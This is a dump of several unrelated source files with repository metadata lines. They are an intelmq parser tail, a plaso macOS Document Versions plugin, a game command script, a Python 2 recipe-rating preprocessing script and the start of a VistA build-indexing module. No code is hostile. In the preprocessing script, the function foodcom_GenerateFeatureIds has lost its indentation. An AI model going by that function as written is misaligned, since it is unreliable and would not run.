    bot = GenericIPlistParserBot(sys.argv[1])
    bot.start()
| pkug/intelmq | intelmq/bots/parsers/generic/parser_netset.py | Python | agpl-3.0 | 1,172 |
# -*- coding: utf-8 -*-
"""Parser for the Mac OS X Document Versions files."""
from plaso.containers import time_events
from plaso.lib import eventdata
from plaso.parsers import sqlite
from plaso.parsers.sqlite_plugins import interface
__author__ = 'Joaquin Moreno Garijo (Joaquin.MorenoGarijo.2013@live.rhul.ac.uk)'
class MacDocumentVersionsEvent(time_events.PosixTimeEvent):
  """Convenience class for an entry from the Document Versions database."""

  DATA_TYPE = u'mac:document_versions:file'

  def __init__(self, posix_time, name, path, version_path, last_time, user_sid):
    """Initializes the event object.

    Args:
      posix_time: The POSIX time value.
      name: name of the original file.
      path: path from the original file.
      version_path: path to the version copy of the original file.
      last_time: the last time the file was seen (file_last_seen column).
      user_sid: identification user ID that opened the file.
    """
    super(MacDocumentVersionsEvent, self).__init__(
        posix_time, eventdata.EventTimestamp.CREATION_TIME)
    self.name = name
    self.path = path
    self.version_path = version_path
    # TODO: shouldn't this be a separate event?
    self.last_time = last_time
    # Note that the user_sid value is expected to be a string.
    self.user_sid = u'{0!s}'.format(user_sid)
class MacDocumentVersionsPlugin(interface.SQLitePlugin):
  """Parse the Mac OS X Document Versions SQLite database.."""

  NAME = u'mac_document_versions'
  DESCRIPTION = u'Parser for document revisions SQLite database files.'

  # Define the needed queries.
  # name: name from the original file.
  # path: path from the original file (include the file)
  # last_time: last time when the file was replicated.
  # version_path: path where the version is stored.
  # version_time: the timestamp when the version was created.
  QUERIES = [
      ((u'SELECT f.file_name AS name, f.file_path AS path, '
        u'f.file_last_seen AS last_time, g.generation_path AS version_path, '
        u'g.generation_add_time AS version_time FROM files f, generations g '
        u'WHERE f.file_storage_id = g.generation_storage_id;'),
       u'DocumentVersionsRow')]

  # The required tables for the query.
  REQUIRED_TABLES = frozenset([u'files', u'generations'])

  # The SQL field path is the relative path from DocumentRevisions.
  # For this reason the Path to the program has to be added at the beginning.
  ROOT_VERSION_PATH = u'/.DocumentRevisions-V100/'

  def DocumentVersionsRow(
      self, parser_mediator, row, query=None, **unused_kwargs):
    """Parses a document versions row.

    Args:
      parser_mediator: A parser mediator object (instance of ParserMediator).
      row: The row resulting from the query.
      query: Optional query string.
    """
    # Note that pysqlite does not accept a Unicode string in row['string'] and
    # will raise "IndexError: Index must be int or string".
    # version_path = "PerUser/UserID/xx/client_id/version_file"
    # where PerUser and UserID are a real directories.
    paths = row['version_path'].split(u'/')
    if len(paths) < 2 or not paths[1].isdigit():
      user_sid = u''
    else:
      user_sid = paths[1]
    version_path = self.ROOT_VERSION_PATH + row['version_path']
    path, _, _ = row['path'].rpartition(u'/')

    event_object = MacDocumentVersionsEvent(
        row['version_time'], row['name'], path, version_path,
        row['last_time'], user_sid)
    parser_mediator.ProduceEvent(event_object, query=query)

# Register the plugin with the SQLite parser so it is discovered at runtime.
sqlite.SQLiteParser.RegisterPlugin(MacDocumentVersionsPlugin)
| dc3-plaso/plaso | plaso/parsers/sqlite_plugins/mac_document_versions.py | Python | apache-2.0 | 3,581 |
from resources.datatables import PlayerFlags
import sys
def setup():
    """No pre-command setup is required for this command script."""
    return
def run(core, actor, target, commandString):
    # Toggle the FACTIONRANK display flag on the actor's player ('ghost') object.
    ghost = actor.getSlottedObject('ghost')
    ghost.toggleFlag(PlayerFlags.FACTIONRANK)
    return
| agry/NGECore2 | scripts/commands/toggledisplayingfactionrank.py | Python | lgpl-3.0 | 232 |
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 10 15:39:31 2015
This file provides the routines to preprocess and prepare foodcom data in order
to have a quality set of datasets, following some simple rules:
- users have at least 4 event ratings
- items/recipes have at least 4 event ratings
- the output files will be in libsvm format
@author: rui.maia
"""
from __future__ import division
import sys
import os
sys.path.append(os.path.abspath("Tools"))
from preprocess import *
import pandas as pd
import csv
from random import shuffle

# Feature aggregation mode constants -- presumably select average/stdev based
# user and item features in the downstream generators; TODO confirm usage.
AVG_USER = 1
STD_USER = 2
AVG_STD_USER = 3
AVG_ITEM = 1
STD_ITEM = 2
AVG_STD_ITEM = 3

# Global feature-id state: next_free_id hands out consecutive ids and the
# hash_* dicts map raw user/recipe/ingredient/diet/cuisine values to their
# assigned feature id (see foodcom_GenerateFeatureIds).
next_free_id = 1
hash_user = {}
hash_rec = {}
hash_ing = {}
hash_diet = {}
hash_cuis = {}
#==============================================================================
# Receives a dataset and ovewrites it cutting the original file to a
# count (input parameter) number of entries
#==============================================================================
def foodcom_CutSave(datafile, count):
    """Shuffle the lines of datafile and overwrite it with the first count lines."""
    print "Datafile:%s" % datafile
    print "Final Count:%d" % count
    total_rat_cnt = 0
    complete_ds = []
    try:
        with open(datafile) as f:
            for line in f:
                line = line.strip()
                complete_ds.append(line)
                total_rat_cnt += 1
            # NOTE(review): redundant -- the with block already closes f.
            f.close()
    except ValueError:
        print "Error on line %d" % total_rat_cnt
        raise
    print "Total Rating Count in Dataset " + datafile + " is " + str(total_rat_cnt)
    print "Shuffling and cutting complete dataset to a total of %d lines" % count
    # Random sample: shuffle first, then keep the first `count` lines.
    shuffle(complete_ds)
    final_ds = complete_ds[:count]
    print "Writing train dataset to txt file"
    f = open(datafile, "w")
    f.write("\n".join(map(lambda x: str(x), final_ds)))
    f.close()
    print "Finished shuffling and cutting file"
    return 1
########################################################################################
# Remove foodcom untrustable ratings (count item and user rating events, then filter)
########################################################################################
def foodcom_QualityFilter(rat_ds, out_base_ds, min_user, min_item):
    """Filter ratings so every user/item has at least min_user/min_item events."""
    # pass in column names for each CSV
    print 'Loading ratings...'
    ratings_cols = ['rating', 'user', 'id']
    ratings = pd.read_csv(rat_ds, sep='\t', names=ratings_cols)
    print 'Ratings Shape: %s' % str(ratings.shape)
    print 'Remove untrustable users and recipes...'
    atleast_5 = ratings.groupby('id').filter(lambda x: len(x) >= min_item)
    print 'Ratings (>' + str(min_item) + ' item event rating) shape' + str(atleast_5.shape)
    final_ds = atleast_5.groupby('user').filter(lambda y: len(y) >= min_user)
    print 'Ratings (>' + str(min_user) + ' user event rating) shape' + str(final_ds.shape)
    ######################### DS OUPUT
    final_ds_len = final_ds.shape[0]
    atleast_5_len = atleast_5.shape[0]
    # Iterate until both constraints hold simultaneously: dropping users can
    # push recipes below min_item again and vice versa.
    while final_ds_len != atleast_5_len:
        print 'Remove untrustable users and recipes...'
        atleast_5 = final_ds.groupby('id').filter(lambda x: len(x) >= min_item)
        print 'Ratings (>' + str(min_item) + ' item event rating) shape' + str(atleast_5.shape)
        final_ds = atleast_5.groupby('user').filter(lambda y: len(y) >= min_user)
        print 'Ratings (> ' + str(min_user) + ' user event rating) shape' + str(final_ds.shape)
        final_ds_len = final_ds.shape[0]
        atleast_5_len = atleast_5.shape[0]
    print 'Saving DS base dataset with shape ' + str(final_ds.shape)
    final_ds.to_csv(out_base_ds, sep='\t', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id'])
    print '...done'
###########################################################################
######### Load recipe information from files got from foodcom site
###########################################################################
def foodcom_LoadData(rec_ing_file, rec_cuis_file, rec_diet_file):
    """Load per-recipe ingredients, cuisines and diets from three TSV files.

    Each input line is tab separated with the recipe id in column 3 and the
    attribute values in the remaining columns. Returns a dict mapping
    recipe id -> {'MainIng','Cuisine','Dietary'} comma-joined strings, and
    writes per-attribute frequency files into the Data directory.
    """
    data = {}
    ingredients = {}
    cuisines = {}
    diets = {}
    try:
        # ingredients
        file = open(rec_ing_file)
        for line in file:
            # get recipe id
            fields=line.split('\t')
            rec_id = fields[2].strip()
            # if dictionary empty: set ingredients for recipe
            if rec_id not in data:
                # get recipe ingredients
                rec_ings = fields[3:]
                for elem in rec_ings:
                    elem = elem.strip()
                    if len(elem) > 0: ingredients[elem] = ingredients.get(elem, 0) + 1
                tempData = dict()
                tempData['MainIng']=(",".join(rec_ings)).strip()
                data[rec_id] = tempData
    except IndexError:
        print 'Error in file:' + rec_ing_file
        print line
        raise
    try:
        # cuisine
        file = open(rec_cuis_file)
        for line in file:
            # get recipe id
            fields=line.split('\t')
            rec_id = fields[2]
            tempData = data[rec_id.strip()]
            if 'Cuisine' not in tempData:
                # get recipe cuisines
                rec_cuis = fields[3:]
                for elem in rec_cuis:
                    elem = elem.strip()
                    if len(elem) > 0: cuisines[elem] = cuisines.get(elem, 0) + 1
                tempData['Cuisine']=(",".join(rec_cuis)).strip()
    except IndexError:
        print 'Error in file:' + rec_cuis_file
        print line
        raise
    try:
        # dietary
        file = open(rec_diet_file)
        for line in file:
            # get recipe id
            fields=line.split('\t')
            rec_id = fields[2]
            tempData = data[rec_id.strip()]
            if 'Dietary' not in tempData:
                # get recipe dietaries
                rec_diets = fields[3:]
                for elem in rec_diets:
                    elem = elem.strip()
                    if len(elem) > 0: diets[elem] = diets.get(elem, 0) + 1
                tempData['Dietary']=(",".join(rec_diets)).strip()
    except IndexError:
        print 'Error in file:' + rec_diet_file
        print line
        raise
    print 'Recipes (count): %d' % len(data.keys())
    # Dump attribute frequency tables for later inspection.
    print 'Saving different Ingredients %d' % len(ingredients)
    with open('Data\\foodcom_ingredients.txt', 'w') as writer:
        writer.write('Ingredient\tRecipeCount\n')
        for key, entry in ingredients.items():
            writer.write('%s\t%d\n' % (key.strip(), entry))
    print 'Saving different Cuisines %d' % len(cuisines)
    with open('Data\\foodcom_cuisines.txt', 'w') as writer:
        writer.write('Cuisine\tRecipeCount\n')
        for key, entry in cuisines.items():
            writer.write('%s\t%d\n' % (key.strip(), entry))
    print 'Saving different Diets %d' % len(diets)
    with open('Data\\foodcom_diets.txt', 'w') as writer:
        writer.write('Diet\tRecipeCount\n')
        for key, entry in diets.items():
            writer.write('%s\t%d\n' % (key.strip(), entry))
    '''
    for key, value in data.iteritems():
        if len(value['MainIng']) > 0:
            value['MainIng'] = value['MainIng'][:-1]
        if len(value['Dietary']) > 0:
            value['Dietary'] = value['Dietary'][:-1]
        if len(value['Cuisine']) > 0:
            value['Cuisine'] = value['Cuisine'][:-1]
    '''
    return data
## Generates the base needed datasets
# pre_foodcom_ds8 - Rating + Users + Item + Ingredients
# pre_foodcom_ds9 - Rating + Users + Item + Ingredients + Dietary
# pre_foodcom_ds10 - Rating + Users + Item + Ingredients + Dietary + Cuisine
# pre_foodcom_ds14 - Rating + Users + Item + Dietary
# pre_foodcom_ds15 - Rating + Users + Item + Cuisine
def foodcom_GenerateBaseDS(basic_ds_path, recipe_inf_lst, out_baseds):
    """Join the ratings dataset with recipe info and emit the base CSV variants."""
    col_names = ['rating', 'user', 'id', 'ingredients', 'cuisine', 'dietary']
    final = []
    errors = 0
    with open(basic_ds_path) as basic_ds:
        for line in basic_ds:
            try:
                (rating, user, item) = (line.strip()).split(SEP_CHAR)
                rec_info = recipe_inf_lst[item]
                final.append((rating, user, item, rec_info['MainIng'], rec_info['Cuisine'], rec_info['Dietary']))
            except KeyError:
                # Recipes without scraped info are counted and skipped.
                # print line
                #raise
                errors += 1
    print 'Total recipes with info[%d] and no info on [%d]' % (len(final), errors)
    print 'Saving to csv...'
    complete_ds = pd.DataFrame(final, columns=col_names)
    # One CSV per feature combination (see the mapping in the header comment).
    complete_ds.to_csv(out_baseds, sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients', 'dietary', 'cuisine'])
    complete_ds.to_csv('Data\\pre_foodcom_ds', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id'])
    complete_ds.to_csv('Data\\pre_foodcom_ds8', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients'])
    complete_ds.to_csv('Data\\pre_foodcom_ds9', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients', 'dietary'])
    complete_ds.to_csv('Data\\pre_foodcom_ds10', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'ingredients', 'dietary', 'cuisine'])
    complete_ds.to_csv('Data\\pre_foodcom_ds14', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'dietary'])
    complete_ds.to_csv('Data\\pre_foodcom_ds15', sep=';', encoding='utf-8', index=False, header=False, columns=['rating', 'user', 'id', 'cuisine'])
def foodcom_GenerateFeatureIds(complete_ds):
global next_free_id
global hash_user
global hash_rec
global hash_ing
global hash_diet
global hash_cuis
total_rat_cnt = 0
total_cui_set = 0
total_diet_set = 0
total_ing_set = 0
rate_sum = 0
try:
with open(complete_ds) as f:
for line in f:
line = line.strip()
(rating, user, recipeid, ingredient_str, dietary_str, cuisine_str)=line.split(';')
rate_sum += int(rating)
# USER ----------- get id for user
feature_id = hash_user.get(user, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_user[user] = next_free_id
next_free_id += 1
# RECIPE ---------- get id for recipeid
feature_id = hash_rec.get(recipeid, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_rec[recipeid] = next_free_id
next_free_id += 1
# INGREDIENTS -----------------
if len(ingredient_str) >0:
ingredient_list = ingredient_str.split(',')
else:
ingredient_list = []
# for each ingredient
for ing in ingredient_list:
total_ing_set += 1
# get id for recipeid
feature_id = hash_ing.get(ing, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_ing[ing] = next_free_id
next_free_id += 1
# DIETARY -----------------------------
if len(dietary_str) >0:
diet_list = dietary_str.split(',')
else:
diet_list = []
# for each ingredient
for diet in diet_list:
total_diet_set += 1
# get id for recipeid
feature_id = hash_diet.get(diet, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_diet[diet] = next_free_id
next_free_id += 1
# CUISINE -----------------------------
if len(cuisine_str) >0:
cuis_list = cuisine_str.split(',')
else:
cuis_list = []
# for each ingredient
for cuis in cuis_list:
total_cui_set += 1
# get id for recipeid
feature_id = hash_cuis.get(cuis, 0)
# if null, add id and increment next_free_identifier
if (feature_id == 0):
hash_cuis[cuis] = next_free_id
next_free_id += 1
total_rat_cnt += 1
except ValueError:
print "Error on line %d: %s" % (total_rat_cnt, line)
raise
f = open('Data\\foodcom_classification', 'w')
f.write('Number of users:%d\n' % len(hash_user.keys()))
f.write('Number of items:%d\n' % len(hash_rec.keys()))
f.write('Number of events:%d\n' % total_rat_cnt)
f.write('Number of ingredients:%d\n' % len(hash_ing.keys()))
f.write('Number of cuisine types:%d\n' % len(hash_cuis.keys()))
f.write('Number of dietary groups:%d\n' % len(hash_diet.keys()))
f.write('Avg. rating value:%0.2f\n' % (rate_sum/total_rat_cnt))
f.write('Avg. number of ratings per user:%0.2f\n' % (total_rat_cnt/len(hash_user.keys())))
f.write('Avg. number of ratings per item:%0.2f\n' % (total_rat_cnt/len(hash_rec.keys())))
f.write('Avg. number of ingredients per item:%0.2f\n' % ((total_ing_set/len(hash_rec.keys()))))
f.write('Avg. number of cuisine type per item:%0.2f\n' % ((total_cui_set/len(hash_rec.keys()))))
f.write('Avg. number of dietary groups per item:%0.2f\n' % ((total_diet_set/len(hash_rec.keys()))))
f.write('Sparsity on the ratings matrix:%0.3f%%\n' % percentage(total_rat_cnt ,(len(hash_user.keys())*len(hash_rec.keys()))))
f.close()
return next_free_id
def percentage(part, whole):
    """Express ``part`` as a percentage of ``whole`` (always a float)."""
    scaled = 100 * float(part)
    return scaled / float(whole)
def foodcom_CsvtoLibsvm(datafile, outdatafile, is_ing, is_diet, is_cuis):
    """
    Convert a ';'-separated ratings csv into libSVM/libFM sparse format,
    assigning a globally unique feature id to every user, recipe,
    ingredient, dietary group and cuisine value via the shared hash_*
    tables; writes one tab-separated line per rating event.
    is_ing / is_diet / is_cuis -- which optional columns the input carries.
    NOTE(review): only the flag combinations used by foodcom_GenerateStatsDS
    are handled by the chain below; e.g. is_ing=False with both is_diet and
    is_cuis True would leave the column variables unbound -- confirm before
    calling with new combinations.
    Returns the next free feature id.
    """
    global next_free_id
    global hash_user
    global hash_rec
    global hash_ing
    global hash_diet
    global hash_cuis
    total_rat_cnt = 0
    complete_ds = []
    try:
        with open(datafile) as f:
            for line in f:
                entry = []
                line = line.strip()
                if (is_ing == False and is_diet == False and is_cuis == False):
                    (rating, user, recipeid)=line.split(';')
                if (is_ing == True and is_diet == False and is_cuis == False):
                    (rating, user, recipeid, ingredient_str)=line.split(';')
                elif (is_ing == True and is_diet == True and is_cuis == False):
                    (rating, user, recipeid, ingredient_str, dietary_str)=line.split(';')
                elif (is_ing == True and is_diet == True and is_cuis == True):
                    (rating, user, recipeid, ingredient_str, dietary_str, cuisine_str)=line.split(';')
                elif (is_ing == False and is_diet == True and is_cuis == False):
                    (rating, user, recipeid, dietary_str)=line.split(';')
                elif (is_ing == False and is_diet == False and is_cuis == True):
                    (rating, user, recipeid, cuisine_str)=line.split(';')
                entry.append(rating) # append rating to libSVM format
                # USER ----------- get id for user
                feature_id = hash_user.get(user, 0)
                # if null, add id and increment next_free_identifier
                if (feature_id == 0):
                    hash_user[user] = next_free_id
                    next_free_id += 1
                entry.append("%d:1" % hash_user[user]) # append user feature to libSVM format
                # RECIPE ---------- get id for recipeid
                feature_id = hash_rec.get(recipeid, 0)
                # if null, add id and increment next_free_identifier
                if (feature_id == 0):
                    hash_rec[recipeid] = next_free_id
                    next_free_id += 1
                entry.append("%d:1" % hash_rec[recipeid]) # append user feature to libSVM format
                # INGREDIENTS -----------------
                if is_ing:
                    if len(ingredient_str) >0:
                        ingredient_list = ingredient_str.split(',')
                    else:
                        ingredient_list = []
                    # for each ingredient
                    for ing in ingredient_list:
                        # get id for recipeid
                        feature_id = hash_ing.get(ing, 0)
                        # if null, add id and increment next_free_identifier
                        if (feature_id == 0):
                            hash_ing[ing] = next_free_id
                            next_free_id += 1
                        entry.append("%d:1" % hash_ing[ing]) # append ingredient feature to libSVM format
                # DIETARY -----------------------------
                if is_diet:
                    if len(dietary_str) >0:
                        diet_list = dietary_str.split(',')
                    else:
                        diet_list = []
                    # for each ingredient
                    for diet in diet_list:
                        # get id for recipeid
                        feature_id = hash_diet.get(diet, 0)
                        # if null, add id and increment next_free_identifier
                        if (feature_id == 0):
                            hash_diet[diet] = next_free_id
                            next_free_id += 1
                        entry.append("%d:1" % hash_diet[diet]) # append dietary feature to libSVM format
                # CUISINE -----------------------------
                if is_cuis:
                    if len(cuisine_str) >0:
                        cuis_list = cuisine_str.split(',')
                    else:
                        cuis_list = []
                    # for each ingredient
                    for cuis in cuis_list:
                        # get id for recipeid
                        feature_id = hash_cuis.get(cuis, 0)
                        # if null, add id and increment next_free_identifier
                        if (feature_id == 0):
                            hash_cuis[cuis] = next_free_id
                            next_free_id += 1
                        entry.append("%d:1" % hash_cuis[cuis]) # append cuisine feature to libSVM format
                complete_ds.append(entry)
                total_rat_cnt += 1
    except ValueError:
        print "Error on line %d: %s" % (total_rat_cnt, line)
        raise
    with open(outdatafile, 'wb') as f:
        writer = csv.writer(f, delimiter = '\t')
        writer.writerows(complete_ds)
    print 'Saved file %s with %d entries' % (outdatafile, total_rat_cnt)
    return next_free_id
def foodcom_GenerateStatsDS():
    """
    Convert every pre_foodcom_ds* csv to libSVM format and emit the 5-fold
    splits, optionally augmented with per-user/per-item average and standard
    deviation statistics (the AVG_* / AVG_STD_* flags).
    """
    global next_free_id
    # Ratings + users + items only, plus statistic-augmented variants ds2-ds7.
    foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds', 'Data\\foodcom_ds', False, False, False)
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, 0, 0, 'foodcom_ds')
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_USER, 0, 'foodcom_ds2')
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_STD_USER, 0, 'foodcom_ds3')
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, 0, AVG_ITEM, 'foodcom_ds4')
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, 0, AVG_STD_ITEM, 'foodcom_ds5')
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds6')
    splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_STD_USER, AVG_STD_ITEM, 'foodcom_ds7')
    # + ingredients (ds8), and its averaged variant (ds11).
    foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds8', 'Data\\foodcom_ds8', True, False, False)
    splitKFoldSave('Data\\', 'foodcom_ds8', next_free_id, 5, 0, 0, 'foodcom_ds8')
    splitKFoldSave('Data\\', 'foodcom_ds8', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds11')
    # + ingredients + dietary (ds9 / ds12).
    foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds9', 'Data\\foodcom_ds9', True, True, False)
    splitKFoldSave('Data\\', 'foodcom_ds9', next_free_id, 5, 0, 0, 'foodcom_ds9')
    splitKFoldSave('Data\\', 'foodcom_ds9', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds12')
    # + ingredients + dietary + cuisine (ds10 / ds13).
    foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds10', 'Data\\foodcom_ds10', True, True, True)
    splitKFoldSave('Data\\', 'foodcom_ds10', next_free_id, 5, 0, 0, 'foodcom_ds10')
    splitKFoldSave('Data\\', 'foodcom_ds10', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds13')
    # + dietary only (ds14 / ds16).
    foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds14', 'Data\\foodcom_ds14', False, True, False)
    splitKFoldSave('Data\\', 'foodcom_ds14', next_free_id, 5, 0, 0, 'foodcom_ds14')
    splitKFoldSave('Data\\', 'foodcom_ds14', next_free_id, 5, 1, 1, 'foodcom_ds16')
    # + cuisine only (ds15 / ds17).
    foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds15', 'Data\\foodcom_ds15', False, False, True)
    splitKFoldSave('Data\\', 'foodcom_ds15', next_free_id, 5, 0, 0, 'foodcom_ds15')
    splitKFoldSave('Data\\', 'foodcom_ds15', next_free_id, 5, 1, 1, 'foodcom_ds17')
# Script entry: run the preparation pipeline step by step. Earlier stages are
# commented/quoted out once their output files exist on disk.
#foodcom_CutSave('Data\\foodcom.txt', 231355)
print 'Remove all the untrustable users and items (with less than 4 assotiated rating events)'
foodcom_QualityFilter('Data\\foodcom.txt', 'Data\\pre_foodcom_ds', 4, 4)
# The triple-quoted block below holds the (currently disabled) follow-on
# stages: base dataset generation, feature-id assignment and stats splits.
'''
print 'Generate base datasets'
foodcom_GenerateBaseDS('Data\\pre_foodcom_ds', foodcom_LoadData('Data\\foodcom_ds8', 'Data\\foodcom_ds14', 'Data\\foodcom_ds15'), 'Data\\foodcom_ds_complete')
print 'Generate feature ids'
foodcom_GenerateFeatureIds('Data\\foodcom_ds_complete')
print 'Next free id:' + str(next_free_id)
print 'Generate statistics datasets (with average and standard deviation'
foodcom_GenerateStatsDS()
'''
#
## VOLDEMORT (VDM) VistA Comparer
#
# (c) 2012 Caregraf, Ray Group Intl
# For license information, see LICENSE.TXT
#
"""
Module for retrieving, caching and analysing a VistA's builds returned by FMQL
"""
import os
import re
import urllib
import urllib2
import json
import sys
from datetime import timedelta, datetime
import logging
import operator
from collections import OrderedDict, defaultdict
from copies.fmqlCacher import FMQLDescribeResult
__all__ = ['VistaBuilds']
class VistaBuilds(object):
    """
    Lynchpin for most VistA System data reporting.
    TODO:
    - test install for files now in here ...
    - important: ex/ files like 19620.1 showing up in listFiles due to COMPARE DSIR 5.2
    which though loaded was never installed
    - consider pass in names NOT to load/index ie/ if in Base, why reload from remote system. ie/ depth not needed if date distrib equal.
    - pkg tagger (list of regexps - [(r'xx', PKGNAME)] ie build pkg tagger
    - "package name or prefix"
    - will use (uri, label) form from Cache update
    - tie into Stations and Conventions for naming Class 3 builds
    - use Cacher filters like "yes/no" -> true/false, default values etc. ie. sparce hard to record on
    - defaults in Comparer ... better done in here
    - handle cnodes generically ie/ if there properly then deref file by name into the desired label for an index. Make the indexes into one dictionary ie/ self.__indexes
    - consider link into (static) release notes
    - current version grabs everything about every build into a Cache. Instead
    grab select builds only, one by one. ex/ grab only those not in base.
    """
    def __init__(self, vistaLabel, fmqlCacher):
        # Indexing is eager: constructing the object fetches (or reads from
        # cache) and indexes every build and install of the target VistA.
        self.vistaLabel = vistaLabel
        self.__fmqlCacher = fmqlCacher
        self.__indexNCleanBuilds()
    def __str__(self):
        return "Builds of %s" % self.vistaLabel
    def getNoSpecificValues(self):
        """
        How many datapoints are available <=> number of fields in indexed entries
        TODO: expand for tabulation - show file/field=#
        """
        return self.__noSpecificValues
    def listPackages(self):
        """
        TODO: may just move Package file in here ie/ get shallow 9_4 and nix all the other Package file logic (or leave for Routines and later)
        """
        # Packages sorted by their numeric IEN (the part after the '-').
        return [(packageId, self.__packages[packageId]) for packageId in sorted(self.__packages.keys(), key=lambda x: int(x.split("-")[1]))]
    def getBuildsOfPackage(self, packageName):
        return self.__buildsByPackageName[packageName]
    def listBuilds(self, installedOnly=True):
        """
        Returns list of build names in Build file order if all builds requested and
        in active/installed order if ask for 'installedOnly'
        """
        if installedOnly:
            return list(self.__buildAboutsInstalled)
        return list(self.__buildAbouts)
    def describeBuild(self, buildName):
        """
        Fields of interest:
        - vse:ien
        - [type] "SINGLE PACKAGE", "MULTI-PACKAGE", "GLOBAL PACKAGE"
        - [track_package_nationally]
        - [date_distributed]
        - [package_file_link]
        - [description_of_enhancements]
        Others are less interesting.
        """
        return self.__buildAbouts[buildName]
    def getFiles(self, installedOnly=True):
        """
        All files created/updated in the build system with list of builds effecting them
        Precise Query: DESCRIBE 9_64 IN %s CSTOP 1000
        """
        fls = defaultdict(list)
        for buildName, buildFiles in self.__buildFiles.items():
            if installedOnly and buildName not in self.__buildAboutsInstalled:
                continue
            for buildFile in buildFiles:
                # TODO: remove once FOIA GOLD has this stuff (will go from Cache too)
                if float(buildFile["vse:file_id"]) < 1.1:
                    continue
                fls[buildFile["vse:file_id"]].append(buildName)
        return fls
    def describeBuildFiles(self, buildName):
        """
        From Build (9.6)/File (9.64)
        Fields:
        vse:file_id (from 'file')
        data_comes_with_file
        send_full_or_partial_dd
        update_the_data_dictionary
        sites_data: overwrite etc.
        ... others less interesting
        TODO: need to preserve order of builds (out of order now)
        """
        # file fields with: set(field for fis in self.__buildFiles.values() for fi in fis for field in fi)
        return [] if buildName not in self.__buildFiles else self.__buildFiles[buildName]
    def getGlobals(self):
        pass
    def describeBuildGlobals(self, buildName):
        """
        TODO: may remove as doesn't seem to be in any builds (ala GLOBAL BUILD option in 'type')
        """
        return [] if buildName not in self.__buildGlobals else self.__buildGlobals[buildName]
    def getRoutines(self):
        pass
    def describeBuildRoutines(self, buildName):
        """
        From Build Component (9.67)/build component=Build (.01=1-9.8)
        TODO: issue of no "action". Assume "send to site" (added) vs "delete at site"?
        Includes Delete
        Precise Query: DESCRIBE 9_67 IN %s FILTER(.01=\"1-9.8\") CSTOP 1000
        """
        return [] if buildName not in self.__buildRoutines else self.__buildRoutines[buildName]
    def listInstallationRoutines(self, buildName):
        """
        TODO: may add to routines list and support a filter.
        As opposed to routines in the build, these are routines that run along with the build process.
        - comments: "This routine will be run as part of the post-install for patch"
        - some early builds don't name their routines -- A4A7KILL in A4A7*1.01*11 is clearly a build routine. Asked to run manually.
        - Some seem to have be batch culled in FOIA (RPMS still has "DG272PT*" is in build DG*5.3*272)
        - one can call others: in RPMS where GMRAY18 is ... it calls ^GMRAY18A,^GMRAY18B,^GMRAY18C,^GMRAY18D,^GMRAY18E,^GMRAY18F,^GMRAY18G and ^GMRAY18I,^GMRAY18J,^GMRAY18K,^GMRAY18L,^GMRAY18M,^GMRAY18N,^GMRAY18P.
        """
        pass
    def getRPCs(self):
        pass
    def describeBuildRPCs(self, buildName):
        """
        From Build Component (9.67)/build component=Build (.01=1-8994)
        TODO: still need to add to GOLD
        Includes Delete
        Precise Query: DESCRIBE 9_67 IN %s FILTER(.01=\"1-8994\") CSTOP 1000
        """
        return [] if buildName not in self.__buildRPCs else self.__buildRPCs[buildName]
    def describeBuildMultiples(self, buildName):
        """
        Note that a build may contain others (multiples) and have explicit
        files/kernel etc. Only makes sense in the context of a build ie/ there is
        no "getMultiples" method.
        """
        return [] if buildName not in self.__buildMultiples else self.__buildMultiples[buildName]
    # Page size used when fetching 9_6/9_7 entries from non-GOLD systems.
    __ALL_LIMIT = 200
    def __indexNCleanBuilds(self):
        """
        Index and clean builds - will force caching if not already in cache
        CNodes: only see ...
        'required_build', u'install_questions', u'multiple_build', u'file', 'build_components', u'package_namespace_or_prefix'
        but no "global"
        """
        logging.info("%s: Builds - building Builds Index ..." % self.vistaLabel)
        start = datetime.now()
        self.__noSpecificValues = 0
        # TODO: move to dict of dicts. Dynamic naming.
        self.__buildAbouts = OrderedDict()
        self.__buildFiles = {}
        self.__buildMultiples = {}
        self.__buildGlobals = {}
        self.__buildRoutines = {} # from build components
        self.__buildRPCs = {} # from build components
        self.__buildsByPackageName = defaultdict()
        self.__packages = {}
        limit = 1000 if self.vistaLabel == "GOLD" else VistaBuilds.__ALL_LIMIT
        # Pass 1: index every entry of the Build file (9.6).
        for i, buildResult in enumerate(self.__fmqlCacher.describeFileEntries("9_6", limit=limit, cstop=10000)):
            # logging.info("... build result %d" % i)
            dr = FMQLDescribeResult(buildResult)
            self.__noSpecificValues += dr.noSpecificValues()
            name = buildResult["name"]["value"]
            if name in self.__buildAbouts:
                raise Exception("Two builds in this VistA have the same name %s - breaks assumptions" % name)
            # Don't show FMQL itself
            if re.match(r'CGFMQL', name):
                continue
            self.__buildAbouts[name] = dr.cstopped(flatten=True)
            if "package_file_link" in buildResult:
